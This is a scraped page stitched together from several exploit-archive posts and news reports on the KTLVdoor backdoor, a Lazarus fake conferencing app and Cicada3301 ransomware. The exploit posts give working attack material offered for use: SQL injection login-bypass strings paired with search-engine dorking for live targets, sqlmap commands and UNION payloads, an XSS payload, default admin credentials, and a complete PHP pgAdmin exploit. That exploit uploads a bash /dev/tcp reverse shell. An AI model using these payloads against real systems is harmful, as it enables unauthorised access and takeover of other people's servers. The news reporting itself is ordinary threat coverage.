Aplikasi Sistem Sekolah using CodeIgniter 3 versions 3.0.0 through 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ============================================================================================================================================| # Title     : ASIS | Aplikasi Sistem Sekolah using CodeIgniter 3 - SQL Injection Authentication Bypass                                   || # Author    : checkgue                                                                                                                   || # Tested on : windows 10 (Home) / Browser : Google Chrome 128.0.6613.114 (Official Build) (64-bit)                                       || # Vendor    : https://www.facebook.com/groups/181558652941070/                                                                           |============================================================================================================================================poc :[+] Dorking İn Google or Other Search Enggine. "ASIS | Aplikasi Sistem Sekolah"[+] Use payload : user & pass = ' or 0=0 ##[+] Panel : http://localhost/asispanel/CVE: CVE-2024-45622References:https://aegislens.com/home/cve-2024-45622/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45622https://www.cve.org/CVERecord?id=CVE-2024-45622https://nvd.nist.gov/vuln/detail/CVE-2024-45622https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.mdhttps://github.com/advisories/GHSA-8hxv-6g4p-2w59Greetings to : =====Meta4sec * Bungker |====================

ASIS 3.2.0 SQL Injection

The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China.

The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems.

"KTLVdoor is a highly obfuscated malware that

The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China.

The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems.

"KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning," Trend Micro researchers Cedric Pernet and Jaromir Horejsi said in an analysis published Wednesday.

Some of the tools KTLVdoor impersonates include sshd, Java, SQLite, bash, and edr-agent, among others, with the malware distributed in the form of dynamic-link library (.dll) or a shared object (.so).

Perhaps the most unusual aspect of the activity cluster is the discovery of more than 50 command-and-control (C&C) servers, all hosted at Chinese company Alibaba, that have been identified as communicating with variants of the malware, raising the possibility that the infrastructure could be shared with other Chinese threat actors.

Earth Lusca is known to be active since at least 2021, orchestrating cyber attacks against public and private sector entities across Asia, Australia, Europe, and North America. It's assessed to share some tactical overlaps with other intrusion sets tracked as RedHotel and APT27 (aka Budworm, Emissary Panda, and Iron Tiger).

KTLVdoor, the latest addition to the group's malware arsenal, is highly obfuscated and gets its name from the use of a marker called "KTLV" in its configuration file that includes various parameters necessary to meet its functions, including the C&C servers to connect to.

Once initialized, the malware initiates contact with the C&C server on a loop, awaiting further instructions to be executed on the compromised host. The supported commands allow it to download/upload files, enumerate the file system, launch an interactive shell, run shellcode, and initiate scanning using ScanTCP, ScanRDP, DialTLS, ScanPing, and ScanWeb, among others.

That having said, not much is known about how the malware is distributed and if it has been used to target other entities across the world.

"This new tool is used by Earth Lusca, but it might also be shared with other Chinese-speaking threat actors," the researchers noted. "Seeing that all C&C servers were on IP addresses from China-based provider Alibaba, we wonder if the whole appearance of this new malware and the C&C server could not be some early stage of testing new tooling."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Cross-Platform Malware KTLVdoor Discovered in Attack on Chinese Trading Firm

North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.
The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for

North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview.

The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for Windows and Apple macOS to deliver malware.

Contagious Interview, also tracked as DEV#POPPER, is a malicious campaign orchestrated by a North Korean threat actor tracked by CrowdStrike under the moniker Famous Chollima.

The attack chains begin with a fictitious job interview, tricking job seekers into downloading and running a Node.js project that contains the BeaverTail downloader malware, which in turn delivers a cross-platform Python backdoor known as InvisibleFerret, which is equipped with remote control, keylogging, and browser stealing capabilities.

Some iterations of BeaverTail, which also functions as an information stealer, have manifested in the form of JavaScript malware, typically distributed via bogus npm packages as part of a purported technical assessment during the interview process.

But that changed in July 2024 when the Windows MSI installer and Apple macOS disk image (DMG) files masquerading as the legitimate MiroTalk video conferencing software were discovered in the wild, acting as a conduit to deploy an updated version of BeaverTail.

The latest findings from Group-IB, which has attributed the campaign to the infamous Lazarus Group, suggest that the threat actor is continuing to lean on this specific distribution mechanism, the only difference being that the installer ("FCCCall.msi") mimics FreeConference.com instead of MiroTalk.

It's believed that the phony installer is downloaded from a website named freeconference\[.\]io, which uses the same registrar as the fictitious mirotalk\[.\]net website.

"In addition to Linkedin, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others," security researcher Sharmine Low said.

"After making initial contact, they would often attempt to move the conversation onto Telegram, where they would then ask the potential interviewees to download a video conferencing application, or a Node.js project, to perform a technical task as part of the interview process."

In a sign that the campaign is undergoing active refinement, the threat actors have been observed injecting the malicious JavaScript into both cryptocurrency- and gaming-related repositories. The JavaScript code, for its part, is designed to retrieve the BeaverTail Javascript code from the domain ipcheck\[.\]cloud or regioncheck\[.\]net.

It's worth mentioning here that this behavior was also recently highlighted by software supply chain security firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are simultaneously making use of different propagation vectors.

Another notable change is that BeaverTail is now configured to extract data from more cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X, and Exodus Web3, in addition to implementing functionality to establish persistence using AnyDesk.

That's not all. BeaverTail's information-stealing features are now realized through a set of Python scripts, collectively called CivetQ, which is capable of harvesting cookies, web browser data, keystrokes, and clipboard content, and delivering more scripts. A total of 74 browser extensions are targeted by the malware.

"The malware is able to steal data from Microsoft Sticky Notes by targeting the application's SQLite database files located at \`%LocalAppData%\\Packages\\Microsoft.MicrosoftStickyNotes\_8wekyb3d8bbwe\\LocalState\\plum.sqlite,\` where user notes are stored in an unencrypted format," Low said.

"By querying and extracting data from this database, the malware can retrieve and exfiltrate sensitive information from the victim's Sticky Notes application."

The emergence of CivetQ points to a modularized approach, while also underscoring that the tools are under active development and have been constantly evolving in little increments over the past few months.

"Lazarus has updated their tactics, upgraded their tools, and found better ways to conceal their activities," Low said. "They show no signs of easing their efforts, with their campaign targeting job seekers extending into 2024 and to the present day. Their attacks have become increasingly creative, and they are now expanding their reach across more platforms."

The disclosure comes as the U.S. Federal Bureau of Investigation (FBI) warned of North Korean cyber actors' aggressive targeting of the cryptocurrency industry using "well-disguised" social engineering attacks to facilitate cryptocurrency theft.

"North Korean social engineering schemes are complex and elaborate, often compromising victims with sophisticated technical acumen," the FBI said in an advisory released Tuesday, stating the threat actors scout prospective victims by reviewing their social media activity on professional networking or employment-related platforms.

"Teams of North Korean malicious cyber actors identify specific DeFi or cryptocurrency-related businesses to target and attempt to socially engineer dozens of these companies' employees to gain unauthorized access to the company's network."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Targets Job Seekers with Fake FreeConference App

Tourism Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 Auth BY Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://localhost/tourism/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tourism Management System 1.0 SQL Injection

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

**Taskhub 2.8.8 Insecure Settings**

Posted Sep 3, 2024

Authored by indoushka

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2c385d7b29ff2d1f0cadb673bff0447f2a27c839cc502710002b3eab58740544

Download | Favorite | View

**Taskhub 2.8.8 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v2.8.8 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,625)
*   Arbitrary (17,028)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,868)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,420)
*   DoS (25,190)
*   Encryption (2,389)
*   Exploit (54,101)
*   File Inclusion (4,271)
*   File Upload (1,007)
*   Firewall (822)
*   Info Disclosure (2,911)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,252)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,205)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,652)
*   Remote (31,810)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,693)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,048)
*   Web (10,128)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,278)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,006)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,685)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,797)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,757)
*   Other

Taskhub 2.8.8 Insecure Settings

Webpay E-Commerce version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 SQL Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : catproduct.php?catpro=6[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] Parameter: catpro (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: catpro=6' AND 5853=5853-- KEle    Type: UNION query    Title: Generic UNION query (NULL) - 15 columns    Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 SQL Injection

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.
"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.

"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity company Morphisec said in a technical report shared with The Hacker News.

Written in Rust and capable of targeting both Windows and Linux/ESXi hosts, Cicada3301 first emerged in June 2024, inviting potential affiliates to join their ransomware-as-a-service (RaaS) platform via an advertisement on the RAMP underground forum.

A notable aspect of the ransomware is that the executable embeds the compromised user's credentials, which are then used to run PsExec, a legitimate tool that makes it possible to run programs remotely.

Cicada3301's similarities with BlackCat also extend to its use of ChaCha20 for encryption, fsutil to evaluate symbolic links and encrypt redirected files, as well as IISReset.exe to stop the IIS services and encrypt files that may otherwise be locked for for modification or deletion.

Other overlaps to BlackCat include steps undertaken to delete shadow copies, disable system recovery by manipulating the bcdedit utility, increase the MaxMpxCt value to support higher volumes of traffic (e.g., SMB PsExec requests), and clear all event logs by utilizing the wevtutil utility.

Cicada3301 has also observed stopping locally deployed virtual machines (VMs), a behavior previously adopted by the Megazord ransomware and the Yanluowang ransomware, and terminating various backup and recovery services and a hard-coded list of dozens of processes.

Besides maintaining a built-in list of excluded files and directories during the encryption process, the ransomware targets a total of 35 file extensions - sql, doc, rtf, xls, jpg, jpeg, psd, docm, xlsm, ods, ppsx, png, raw, dotx, xltx, pptx, ppsm, gif, bmp, dotm, xltm, pptm, odp, webp, pdf, odt, xlsb, ptox, mdf, tiff, docx, xlsx, xlam, potm, and txt.

Morphisec said its investigation also uncovered additional tools like EDRSandBlast that weaponize a vulnerable signed driver to bypass EDR detections, a technique also adopted by the BlackByte ransomware group in the past.

The findings follow Truesec's analysis of the ESXi version of Cicada3301, while also uncovering indications that the group may have teamed up with the operators of the Brutus botnet to obtain initial access to enterprise networks.

"Regardless of whether Cicada3301 is a rebrand of ALPHV, they have a ransomware written by the same developer as ALPHV, or they have just copied parts of ALPHV to make their own ransomware, the timeline suggests the demise of BlackCat and the emergence of first the Brutus botnet and then the Cicada3301 ransomware operation may possibly be all connected," the company noted.

The attacks against VMware ESXi systems also entail using intermittent encryption to encrypt files larger than a set threshold (100 MB) and a parameter named "no\_vm\_ss" to encrypt files without shutting down the virtual machines that are running on the host.

The emergence of Cicada3301 has also prompted an eponymous "non-political movement," which has dabbled in "mysterious" cryptographic puzzles, to issue a statement that it has no connection to the ransomware scheme.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Rust-Based Ransomware Cicada3301 Targets Windows and Linux Systems

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

Posted Sep 2, 2024

Authored by indoushka

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2e3a9e009b49f67ad6f0534a437aba16431617d1d2588b6c4ed1087d4399d493

Download | Favorite | View

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

    ====================================================================================================================================================| # Title     : Online Musical Instrument Shop IN v1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                   || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Musical_Instrument_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |====================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.'"()%26%25<acx><ScRiPt >prompt(925772)</ScRiPt>[+] Panel : http://127.0.0.1/ecommerce/admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(925772)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Online Musical Instrument Shop IN 1.0 Cross Site Scripting

Online Job Portal IN version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Online Job Portal IN v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Job_Portal_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /refresh_job_search.php?experience=&qualification=fasd[+] http://127.0.0.1/Job-Portal-master/refresh_job_search.php?experience=&qualification=fasd <=== inject here[+] Login : /admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Job Portal IN 1.0 SQL Injection

pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.

    =============================================================================================================================================| # Title     : pgAdmin 8.4 PHP Code Execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.pgadmin.org/download/                                                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.     This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity   of the database management system and the security of the underlying data.  [+] Description:    The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace "YOUR_IP" and "YOUR_PORT" with your machine's IP address and the port you are listening on.    exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target.[+] How to use it:    Modify "YOUR_IP" and "YOUR_PORT" in the generateReverseShell function to match your machine.    Verify that your machine is listening on the specified port using nc or a similar tool:    nc -lvnp YOUR_PORT[+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine.[+] Line : 156+157        $ip = 'YOUR_IP'; // Replace with your machine's IP        $port = 'YOUR_PORT'; // Replace with the port you want to use[+] Line : 164+165+166           $targetUrl = 'http://target-url.com'; // Replace this with the actual address           $username = 'admin'; // Username (if required)           $password = 'password'; // Password (if required)              [+] Save As poc.php[+] usage : cmd=> php poc.php[+] payload :<?phpclass PGAdminExploit {    private $targetUrl;    private $csrfToken;    private $username;    private $password;    public function __construct($targetUrl, $username = '', $password = '') {        $this->targetUrl = rtrim($targetUrl, '/');        $this->username = $username;        $this->password = $password;    }    public function exploit() {        if ($this->authRequired() && (!$this->username || !$this->password)) {            die("The application requires authentication, please provide valid credentials.\n");        }        if ($this->authRequired()) {            $this->authenticate();            echo "Successfully authenticated to pgAdmin\n";        }        if (!$this->onWindows()) {            die("This exploit is specific to Windows targets!\n");        }        $fileName = 'reverse_shell.php';        $this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell());    }    private function authRequired() {        $res = $this->sendRequest('GET', $this->targetUrl . '/');        return strpos($res, 'Location: login') !== false;    }    private function onWindows() {        $res = $this->sendRequest('GET', $this->targetUrl . '/browser/js/utils.js');        if ($res) {            $platform = $this->getStringBetween($res, "pgAdmin['platform'] = '", "';");            return $platform == 'win32';        }        return false;    }    private function authenticate() {        $loginPage = $this->sendRequest('GET', $this->targetUrl . '/login');        $this->setCsrfTokenFromLoginPage($loginPage);        $res = $this->sendRequest('POST', $this->targetUrl . '/authenticate/login', [            'csrf_token' => $this->csrfToken,            'email' => $this->username,            'password' => $this->password,            'language' => 'en',            'internal_button' => 'Login'        ]);        if (strpos($res, 'Location: login') !== false) {            die("Failed to authenticate to pgAdmin\n");        }    }    private function setCsrfTokenFromLoginPage($response) {        if (preg_match('/csrfToken": "([\w+.-]+)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } elseif (preg_match('/<input.*?id="csrf_token".*?value="(.*?)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } else {            die("Failed to obtain the CSRF token\n");        }    }    private function fileManagerUploadAndTrigger($filePath, $fileContents) {        list($transId, $homeFolder) = $this->fileManagerInit();        $formData = [            'newfile' => new CURLFile($filePath, 'application/octet-stream', $filePath),            'mode' => 'add',            'currentpath' => $homeFolder,            'storage_folder' => 'my_storage'        ];        $res = $this->sendRequest('POST', $this->targetUrl . "/file_manager/filemanager/{$transId}/", $formData, true);        if (strpos($res, '"success":1') === false) {            die("Failed to upload file contents\n");        }        $uploadPath = $this->getStringBetween($res, '"Name":"', '"');        echo "Payload uploaded to: {$uploadPath}\n";        $this->sendRequest('POST', $this->targetUrl . '/misc/validate_binary_path', json_encode([            'utility_path' => substr($uploadPath, 0, -15)        ]), true);    }    private function fileManagerInit() {        $res = $this->sendRequest('POST', $this->targetUrl . '/file_manager/init', json_encode([            'dialog_type' => 'storage_dialog',            'supported_types' => ['sql', 'csv', 'json', '*'],            'dialog_title' => 'Storage Manager'        ]));        $transId = $this->getStringBetween($res, '"transId":"', '"');        $homeFolder = $this->getStringBetween($res, '"homedir":"', '"');        if (!$transId || !$homeFolder) {            die("Failed to initialize a file manager transaction Id or home folder\n");        }        return [$transId, $homeFolder];    }    private function sendRequest($method, $url, $data = [], $multipart = false) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            if ($multipart) {                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            } else {                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));            }        }        if ($this->csrfToken) {            curl_setopt($ch, CURLOPT_HTTPHEADER, [                "X-pgA-CSRFToken: {$this->csrfToken}"            ]);        }        $response = curl_exec($ch);        if (curl_errno($ch)) {            die("cURL Error: " . curl_error($ch) . "\n");        }        curl_close($ch);        return $response;    }    private function getStringBetween($string, $start, $end) {        $string = ' ' . $string;        $ini = strpos($string, $start);        if ($ini == 0) return '';        $ini += strlen($start);        $len = strpos($string, $end, $ini) - $ini;        return substr($string, $ini, $len);    }    private function generateReverseShell() {        // حمولة الاتصال العكسي باستخدام Netcat        $ip = 'YOUR_IP'; // استبدل بـ IP الخاص بجهازك        $port = 'YOUR_PORT'; // استبدل بالمنفذ الذي تريد استخدامه        $shell = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/$ip/$port 0>&1'\"); ?>";        return $shell;    }}// مثال على الاستخدام$targetUrl = 'http://target-url.com'; // استبدل هذا بالعنوان الحقيقي$username = 'admin'; // اسم المستخدم (إذا كان مطلوبًا)$password = 'password'; // كلمة المرور (إذا كانت مطلوبة)$exploit = new PGAdminExploit($targetUrl, $username, $password);$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#sql